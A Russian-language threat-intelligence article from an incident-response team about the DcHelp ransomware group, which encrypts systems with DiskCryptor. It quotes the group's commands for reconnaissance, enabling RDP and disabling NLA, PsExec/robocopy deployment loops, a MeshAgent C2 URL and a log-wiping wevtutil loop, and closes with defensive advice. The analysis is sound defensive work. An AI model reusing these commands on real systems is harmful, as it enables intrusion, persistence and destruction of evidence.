Ransomware: not-a-virus, или Почему антивирус — не панацея при атаке шифровальщиков20.11.2024 16:16

Разбирая очередной инцидент, связанный с атакой шифровальщика, и услышав в очередной раз вопрос «как же так, ведь у нас есть антивирус?!», мы решили поделиться с комьюнити информацией о возобновившейся активности группировки DсHelp.

В этой статье расскажем про участившиеся атаки DсHelp, рассмотрим тактики и техники данной группы, а также отметим, почему антивирус — не панацея и как легитимное ПО может быть использовано против вас.

Злоумышленники все чаще стали использовать в своих атаках абсолютно легитимные инструменты, в том числе инструменты для шифрования данных, которые не вызывают подозрений у антивирусного ПО. Разберем одну из таких групп, активность которой возросла в конце 2024 года.

Профайл DcHelp

DсHelp (Enigma Wolf) — группа злоумышленников, атакующая организации различных отраслей и использующая для шифрования данных компьютеров и серверов программное обеспечение с открытым исходным кодом DiskCryptor.

При успешной атаке на инфраструктуру злоумышленники связываются с пострадавшими посредством e-mail, Telegram или иным способом и требуют приобрести пароль, чтобы вернуть доступ к данным. Сумма выкупа варьируется от $1 000 до $100 000. Оплату берут в Bitcoin, но возможно использование и другой криптовалюты.

На момент публикации активен сайт https://dchelp.org/, на котором можно ознакомиться с FAQ и даже оставить обратную связь:

Группировка DcHelp активна как минимум с конца 2022 года, недавние инциденты с ее участием зафиксированы и расследованы командой Jet CSIRT во втором полугодии 2024 года.

Как атакует DcHelp

Начало атаки

Для получения первоначального доступа к инфраструктуре своих жертв DcHelp в основном ориентируется на «низковисящие фрукты» и эксплуатирует уязвимости публично доступных сервисов, проводит атаки подбора паролей, а также использует легитимные аутентификационные данные, купленные у брокеров первоначального доступа или обнаруженные в утечках.

Получив доступ на узел, злоумышленники первым делом проводят разведку и изучают окружение — например, информацию о пользователе, группах, контроллерах домена:

whoami

net user /domain

net localgroup /domain

netdom query dc

net group «Администраторы домена» /domain

В случае если доступ к системе был получен с непривилегированной учетной записью, злоумышленники повышают привилегии и проводят поиск учетных данных в системе. Для этого они используют следующие инструменты:

• Mimikatz;

• PWVIEWER (Password Viewer);

• PWDCRACKU (Password Cracker);

• ARestore (Account Restore).

Также злоумышленники ищут информацию о паролях в доступных для чтения файлах и в каталогах, используя встроенные в операционные системы механизмы поиска, а также ищут сохраненные пароли в браузерах и электронной почте.

Для сбора дополнительной информации об инфраструктуре злоумышленники используют:

Пример команды PowerShell:

Get-ADComputer -Filter * -Properties * | Sort ipv4* | FT Name, ipv4, oper, LastLogonDate -Autosize

Собранная информация зачастую сохраняется прямо на скомпрометированных системах во временный каталог C:\tmp\:

Закрепление, распространение

После получения информации об инфраструктуре в своих атаках злоумышленники активно используют батники для распространения и запуска ВПО. Например, один из скриптов изменяет параметры реестра ОС Windows, разрешая удаленные подключения по RDP:

reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0 /f

netsh advfirewall firewall set rule group="Remote Desktop" new enable=yes

netsh advfirewall firewall add rule name="Open Port 3389" dir=in action=allow protocol=TCP localport=3389

reg add "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v "UserAuthentication" /t REG_DWORD /d 0 /f

reg add "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 3389 /f

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v TSEnabled /t REG_DWORD /d 1 /f

Для закрепления в инфраструктуре злоумышленники используют MeshAgent, который компилируется с указанием собственного С2-сервера:

MeshAgent получает инструкции по подключению из файла .msh, в формате «ключ=значение». Этот файл не всегда можно обнаружить на скомпрометированных системах, при этом можно извлечь интересующие нас строки из исполняемого файла MeshAgent:

MeshServer=wss://techsupport.myftp.org:443/agent.ashx

Данный С2-сервер оставался неизменным в нескольких атаках.

Распространение ВПО в инфраструктуре производится с использованием утилиты robocopy:

for /f "delims=" %%i in (host.txt) do (

  start robocopy %systemdrive%\tmp\tmp \\%%i\C$\tmp /R:0

ping 127.0.0.1 -n 1

)

Установка и запуск ВПО производится с использованием PsExec:

for /f "delims=" %%i in (host.txt) do (

start psexec.exe -accepteula \\%%i -s C:\tmp\mesh.exe -fullinstall

ping 127.0.0.1 -n 1

)

for /f "delims=" %%i in (host.txt) do (

start psexec.exe -accepteula \\%%i -s sc start "mesh agent"

ping 127.0.0.1 -n 1

)

for /f "delims=" %%i in (host.txt) do (

start psexec.exe -accepteula \\%%i -s C:\tmp\Notepad.bat

start psexec.exe -accepteula \\%%i -s C:\tmp\notepad.exe /SP- /TASKS="" /NOICONS /VERYSILENT /RESTART /SUPPRESSMSGBOXES /NOCANCEL

ping 127.0.0.1 -n 1

)

В качестве средств шифрования используется ПО с открытым исходным кодом DiskCryptor, при этом хэш исполняемого файла может отличаться от инцидента к инциденту, поскольку конкретный экземпляр может быть скомпилирован непосредственно перед атакой. Злоумышленники маскируют данное ПО под другие легитимные программы, например Notepad.exe.

Интересно, что при наличии в инфраструктуре (и возможности компрометации) сервера Kaspersky Security Center злоумышленники предпочитают использовать его функционал для запуска задач по распространению и установке ВПО на конечных узлах:

Распространение MeshAgent через скомпрометированный KSC:

Event 7045, A service was installed in the system.

Service: KL Deployment Wrapper

User: \System

Path: C:\Windows\TEMP\KAVREM~1\C19BB5~4\setup.exe /s /z/p\"TASK_ID=c12xx345-f67x-8910-11x1-21xbz31z4151\"

StartType: Автоматически

Cmdline: C:\Windows\Temp\KAVREM~1\C123BB4~5\exec\m.exe

Impact

После всех подготовительных действий злоумышленники производят шифрование инфраструктуры путем исполнения аналогичных батников, запускающих шифрование на каждом узле из списка в файле host.txt.

Пароль для шифрования создается алгоритмом, описанным в батнике, при этом используется функция генерации случайных чисел, а длина пароля составляет 13 символов (латинские буквы и цифры). Шифрование происходит криптостойкими алгоритмами (AES-256, Twofish, Serpent). Сгенерированные пароли для шифрования копируются злоумышленниками и удаляются после завершения процесса шифрования.

Далее могут затираться следы пребывания на узле путем очистки журналов ОС:

cmd - for /F tokens=*" %1 in ('wevtutil.exe el') DO wevtutil.exe cl "%1"

Возможно ли восстановление?

В ходе расследования инцидентов среди удаленных файлов нам удалось восстановить несколько паролей, что позволило расшифровать часть серверов.

Если с момента инцидента система не перезагружалась, есть шансы извлечь пароли из оперативной памяти. При этом мы не рекомендуем полагаться на везение, а применять лучшие практики по созданию бэкапов. Принцип »3–2–1» никто не отменял, но в рамках расследований мы редко видим эталонное соблюдение данного принципа. И, конечно же, не стоит хранить бэкапы в единственном экземпляре на том же устройстве или в том же сетевом сегменте.

Lessons learned

В современных атаках злоумышленники часто используют абсолютно легитимные инструменты с точки зрения СЗИ для снижения вероятности обнаружения их активности.

Так, используемая связка DiskCryptor, MeshAgent, PsExec не будет вызывать подозрений у установленного антивируса, разве что возможен детект с формулировкой вроде *not-a-virus*. Кроме того, такая атака может быть реализована с использованием других легитимных инструментов: например, шифровальщик ShrinkLocker использует встроенный в Windows Bitlocker).

Расследование инцидента должно заканчиваться этапом «lessons learned», в ходе которого отмечаются те факторы, которые привели к инциденту, разрабатываются меры по недопущению подобных инцидентов в будущем. Конечно, рекомендации будут сильно зависеть от конкретной организации и произошедшего инцидента, используемых технологий и возможностей.

В качестве общих рекомендаций выделим следующие:

• стоит начать с Attack Surface Management и посмотреть на свою инфраструктуру глазами злоумышленников, после чего убрать все «низковисящие фрукты»: установить недостающие обновления и убрать «лишние» активы с внешнего периметра;

• одна из наиболее эффективных мер повышения уровня защищенности — доступ в инфраструктуру из внешних сетей с использованием VPN с двухфакторной аутентификацией.

• обеспечьте резервное копирование критичных систем, причем при реализации системы резервного копирования и восстановления придерживайтесь правила »3–2–1» (хранить по меньшей мере три копии данных, из них две копии — на двух разных носителях, третья копия — на отчуждаемых носителях).

Приложения

MITRE ATT&CK:

IoCs, сетевые индикаторы компрометации:

IoCs, файловые индикаторы компрометации:

© Habrahabr.ru